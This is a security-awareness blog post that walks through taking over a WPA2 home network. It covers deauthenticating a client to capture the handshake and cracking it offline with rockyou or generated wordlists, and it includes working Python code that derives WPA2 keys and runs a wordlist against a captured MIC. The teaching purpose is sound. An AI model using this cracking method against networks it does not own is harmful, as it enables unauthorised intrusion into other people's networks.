Work From Home and Security

The pandemic really taught us how effectively and efficiently we can work from home. The question that comes up here is: are we safe?

I would like to discuss some of the basic security measures we need to follow to protect ourselves from script kiddies. The intention here is not to discuss hacking methods, but to show how easy an attack is if you ignore some basic rules. I am not a hacker; I have always admired those who protect us from hackers. "WFH and security" is a series that will break down and discuss some known vulnerabilities.

From day one I have been told to keep a strong password for anything we work with, but why? This applies to any application, but here we will discuss WiFi (802.11). Let's see how easy it is to get into your network. Before starting, I assume we are all on WPA2 and WPS is either turned off or in PBC (push-button) mode. I am not discussing the other cases because modern home routers default to WPA2 and put WPS in PBC mode. If you are still on WEP, or WPS is enabled in PIN mode rather than PBC, I am really sorry to say your network can be compromised in minutes: WEP's key recovery and the WPS PIN's tiny search space are both well known and supported by off-the-shelf tools.

If you are on WPA2, an attacker's best options for getting into your network are brute force or a rogue access point (RAP). A RAP requires some user action and I will discuss it later. For now, let's focus on how brute forcing is done.

Now you may be thinking, why am I talking about brute forcing when everyone knows how it works? There are two types of brute forcing, online and offline, and in the case of WiFi we use offline brute forcing: the attacker needs to be near the network only long enough to capture one handshake, and every password guess after that is checked on their own machine, with no login attempts the AP could notice, log or rate-limit. How an AP can be brute forced offline is the interesting part here. I am not going into how things work under the hood; this is just an overview of how easy it is.

Here I am using the 2.4 GHz band, where most home routers have their SSID configured. First I will list the available networks, meaning I sniff all the networks around me that communicate in the 2.4 GHz band. This is what our computers and mobile phones do when they list networks. If the SSID is hidden we normally have to add it manually on the computer or phone, but here we can even get it listed with a deauth attack: when the client reconnects, it sends the SSID in the clear in its probe and association frames.

Notice we have two SSIDs, fallback and MyInet. Let's target MyInet and list all the devices connected to it. Notice we do not have the password for MyInet; think of it as our neighbour's router.

In the above screenshot you may spot one device under the STATION header connected to MyInet. Now we need to capture the handshake between the AP and the device. But since the device is already connected to the AP there will not be a new handshake, so we de-authenticate the device from the AP. Here is the trick: we are capturing all the traffic from AP to device and device to AP, so when the client reconnects after the deauth we capture the four-way handshake. Deauth means we pretend to be the AP and send the client a frame saying it has to disconnect, and vice versa. It works by spoofing the MAC addresses of the client and the AP. A deauthentication frame is a management frame, and unless the network uses 802.11w protected management frames (PMF), it is neither authenticated nor encrypted, so any radio within range can forge it.

You may notice that we have already captured the handshake. Now the brute force starts. You can think of it like a hash comparison. The handshake does not carry the password itself; it carries the two nonces, both MAC addresses and a MIC (message integrity code) computed with a key that is derived from the password and the SSID. For each candidate password we derive the same key (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations), recompute the MIC over the captured frame and compare it with the captured MIC. If it matches, that is your password.

Before guessing ourselves we will run it with the famous rockyou wordlist. It is a dump of millions of real passwords leaked from the RockYou breach, so it is the first thing any attacker tries.

Since my password is a common one, I found it in a second.
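The offline check described above, written out as an added Python example (not code from the original post or from aircrack-ng). It implements the WPA2-PSK derivation chain, passphrase to PMK (PBKDF2-HMAC-SHA1 over the SSID) to PTK (PRF-512) to the EAPOL MIC, and then runs a wordlist against a handshake. The "capture" is constructed inside the block from a known passphrase so the script runs offline; the MAC addresses and nonces are arbitrary assumptions, and the wordlist is a four-word stand-in for rockyou.txt.

```python
import hashlib
import hmac

# Constructed demo values: nothing here comes from a real capture. The MAC
# addresses and nonces are arbitrary; the SSID matches the post's example.
SSID = b"MyInet"
AP_MAC = bytes.fromhex("aabbccddeeff")
STA_MAC = bytes.fromhex("112233445566")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def pmk_from_passphrase(passphrase: str, ssid: bytes) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # The 4096 iterations are what make each guess cost thousands of SHA1 computations.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    # PTK = PRF-512(PMK, "Pairwise key expansion",
    #               min(MACs) || max(MACs) || min(nonces) || max(nonces))
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    # The KCK is the first 16 bytes of the PTK.
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce):
    # Minimal EAPOL-Key message 2 (client -> AP) following the 802.11 field layout; MIC zeroed.
    body = (b"\x02"                            # descriptor type: RSN
            + b"\x01\x0a"                      # key information: pairwise | MIC | version 2
            + b"\x00\x10"                      # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce                           # key nonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, RSC, key ID (unused here)
            + bytes(16)                        # MIC field, zero while computing the MIC
            + b"\x00\x00")                     # key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 (Key)


def make_capture(real_passphrase):
    """Constructed stand-in for a captured handshake: the attacker gets everything
    returned here except the passphrase it was built from."""
    pmk = pmk_from_passphrase(real_passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    frame = build_eapol_msg2(SNONCE)
    return SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame, eapol_mic(kck, frame)


def crack_passphrase(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, frame, captured_mic):
    # Offline attack: recompute the MIC for each candidate and compare with the captured MIC.
    # Nothing is sent to the AP, so the owner never sees a failed attempt.
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist standing in for rockyou.txt.
    words = ["letmein", "qwerty", "password123", "iloveyou"]
    print(crack_passphrase(words, *make_capture("password123")))
```

The pure-Python loop is slow by design of PBKDF2 (a few thousand guesses per second per core), which is why real attacks hand the captured handshake to aircrack-ng or hashcat (mode 22000) on a GPU; the computation per guess is exactly the one above, only massively parallel.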

Now suppose it doesn't match any of the generic passwords; then the attacker will generate a wordlist. If your password is 5 characters long, let's see how big the wordlist will be.

In the combinations generated above you can see the file is 67 MB in size, and it will take less than an hour to run through. For comparison, the rockyou wordlist is 134 MB and took around 1.5 hours to finish. Note that 67 MB is what every 5-letter lowercase combination comes to; adding digits, uppercase letters and symbols to the character set makes the list, and the cracking time, many times larger.

Now let's say your password is 8 characters long. Is it good enough?

1750 GB is very big, but don't be overconfident. The attacker does not even have to store the list; the generator can be piped straight into the cracker, so what limits them is the number of guesses, not disk space. They can also take the help of a GPU, or upload the handshake to a site that runs the job for them. Not advised, because it leaks a lot of information, including your MAC address and SSID, and the password itself if the service finds it.

Most attackers create a wordlist based on guesses from the information out there about you: pet names, street names, teams, birthdays. Let's say I want to make combinations of pool + r + live.

The file will be very small even though the password is 9 characters long. Let's see whether your password is in the list.

Your password is in the list :)
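The two sizing steps above (the 67 MB and 1750 GB exhaustive lists) and the targeted pool + r + live list, as one added Python example that is not part of the original post. The size formula assumes the generator writes one candidate per line plus a newline, which is how crunch lays out its output; the 67 MB and 1750 GB figures in the post match a 26-letter lowercase character set, and the example reproduces them. The guess rate, the token list and the suffixes are assumptions chosen for illustration.

```python
import itertools

MIB = 1024 ** 2
GIB = 1024 ** 3


def wordlist_bytes(charset_size: int, length: int) -> int:
    # Exhaustive list: charset_size ** length candidates, each written as
    # `length` characters plus a newline.
    return charset_size ** length * (length + 1)


def crack_hours(candidates: int, rate_per_second: float) -> float:
    # Time to try every candidate at a given guess rate.
    return candidates / rate_per_second / 3600


def targeted_wordlist(tokens, max_parts=3, suffixes=("", "1", "123", "!")):
    # Personal-information list: every ordering of up to max_parts tokens,
    # with three capitalisation variants and a few common suffixes.
    # Far smaller than an exhaustive list of the same length, which is the point.
    out = set()
    for n in range(1, max_parts + 1):
        for combo in itertools.permutations(tokens, n):
            base = "".join(combo)
            for variant in (base, base.capitalize(), base.upper()):
                for suffix in suffixes:
                    out.add(variant + suffix)
    return sorted(out)


if __name__ == "__main__":
    lowercase = 26
    rate = 2600  # assumed CPU rate, guesses per second (roughly rockyou's ~14M lines in 1.5 h)
    for length in (5, 8, 12):
        size = wordlist_bytes(lowercase, length)
        hours = crack_hours(lowercase ** length, rate)
        unit = f"{size / MIB:.0f} MiB" if size < GIB else f"{size / GIB:.0f} GiB"
        print(f"{length} lowercase chars: {unit} on disk, {hours:,.0f} h at {rate}/s")

    # Constructed tokens standing in for what an attacker learns about a target.
    guesses = targeted_wordlist(["pool", "r", "live"])
    print(f"targeted list: {len(guesses)} candidates, "
          f"'poolrlive' present: {'poolrlive' in guesses}")
```

The point the numbers make: 12 lowercase characters is about 10^17 exhaustive guesses, which no home machine gets through, yet a 9-character password built from three guessable words sits in a list of a few hundred entries that cracks in seconds.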

The scary part is that all of this happens without your knowledge. The only visible sign is a brief disconnect when your device is deauthenticated; you may have no clue that someone is trying to compromise your AP password.

You see how much harder brute force becomes when we add 2 more characters to the password. You cannot run an exhaustive brute force on a local machine if your password is 12 characters long: even lowercase letters alone give 26^12, about 10^17, combinations. You also see how easy it is if you use a common password, or one built from words an attacker can guess about you. For an online attack against a login form or service, tools like hydra do the same thing, guess by guess.

Thank you for reading :)

Frontend Engineer